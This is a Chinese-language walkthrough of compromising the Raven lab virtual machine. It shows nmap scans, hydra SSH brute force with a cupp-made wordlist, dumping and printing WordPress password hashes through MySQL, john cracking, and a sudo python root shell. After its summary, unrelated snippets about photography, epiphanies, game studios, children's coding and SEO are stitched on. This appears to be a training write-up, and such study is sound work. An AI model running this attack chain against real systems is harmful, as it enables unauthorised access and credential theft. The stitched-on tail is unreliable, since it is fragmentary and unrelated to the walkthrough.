nmap -p 80,22,21,25,3389,443 192.168.8.0/24
or
netdiscover 192.168.8.0/24
来更加深入的扫描一下:
nmap -sS -sV -T5 -A -p- 192.168.8.156
首先大致浏览了一遍,发现有个wordpress(建议把域名加入hosts):
用户名MICHAEL,既然是wp那就用wpscan,先更新下漏洞库:
WordPress version 4.8.12
Theme twentysenventeen version 1.3
同时这个主题也没有发现有什么东西,所以考虑爆一下后台(字典无果可cewl生成):
爆破的同时我进行了0x03的操作,拿到michael的ssh账号后,可以直接写入shell,并且还没有爆出后台密码,所以停止。
Open SSH 6.7p1
并没有发现对应版本的Vunerability,用hydra爆一下:
hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local
并没有爆出密码,这里用cupp生成一个新的字典:
cupp -i
因为我们只知道目标姓名,其他一概不知,所以没有就回车.
爆出了密码,进入看看吧。
michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 *** P Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
没什么可以利用的,再看一下SUID:
没什么可以直接用的,并且michael没有sudo权限,但是发现了flag2.
看一下网站配置文件,或许有root呢?
Mysql的root权限,尝试用这个密码去登录ssh,但是并没有成功,登陆steven也没成功.
wp_content中发现了flag3
select * from wp_postsG
所以考虑看一下mysql中存放的wp的密码:
select * from wp_usersG
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
这直接解肯定解不开了,想用John破解一下(如有shadow和passwd也可用john):
SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
我们的字典用著名的rockyou,kali自带的:
接下来用john:
john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
emmm,先破着吧,要上操作系统原理了……
破出了steven的密码,尝试去登录ssh成功,因为前面内核和suid提权均失败,并且michael也没有sudo权限,那么看一下Steven是否有sudo权限:
sudo -l
尝试用sudo python执行shell:
sudo python3 -c 'import pty; pty.spawn("/bin/sh")'
emmm,失败……另一种:
sudo python -c 'import os; os.system("/bin/sh")'
flag4
0x05 Summary
本次渗透值得注意的地方就是:
社会工程学密码字典生成的应用
john破解HASH的应用
hydra爆破各种协议的应用
得到的密码可能通用:例如得到wp的密码可以尝试登陆ssh
sudo提权
原创投稿作者:Railgun作者博客:www.pwn4fun.com
模棱两可代表什么意思(相片非常容易造成模棱两可的四种状况)文本用不对,非常容易造成模棱两可。 相片拍不对,一样会造成模棱两可。 今日的《编读往来》,就以“模棱两可”为主题风格,看一下这种给旅游君投去的...
恍然大悟是一种什么感觉?可以说那是精神层面的豁然开朗,整个人似乎能从灵魂上得到升华。 由于当前疫情严重,我们不能出门,只得待在家自我隔离。话说逆境让人成长,绝境让人醒悟,人在绝境中,最容易彻悟,确实...
固件的重要性可想而知。 Security Corner: Cross-Site Request Forgeries再后续的版别中,躲藏办法又有所加深,将办法称号及字符串都保存在配置文件里。...
网游工作室圈子谈游戏创业的人太多太多,教创业的人也太多太多,而且篇幅、内容一个比一个长,一个比一个深,一个比一个广!有用吗?只能说对部分人是有用处,但对另外大部分人可能是毒药,有可操作性吗?不一定或者...
孩子学编程的好处 1、提升团队协作能力:一个人的能力是有限的,只有共同努力才能更好的达成目标,孩子们相互协作相互帮助在互动中增进友谊,学习如何利用团队的力量解决问题。2、少儿学编程的好处如下:提高孩子...
对付企业来说,当我们建设网站时,大部门的需求都是操作企业网站的搜索引擎优化排名来得到更精确的流量,从而导致产物的转型。 但在优化整个站点的进程中,并不是每个搜索引擎优化人员都能在不挥霍更多搜索引擎优化...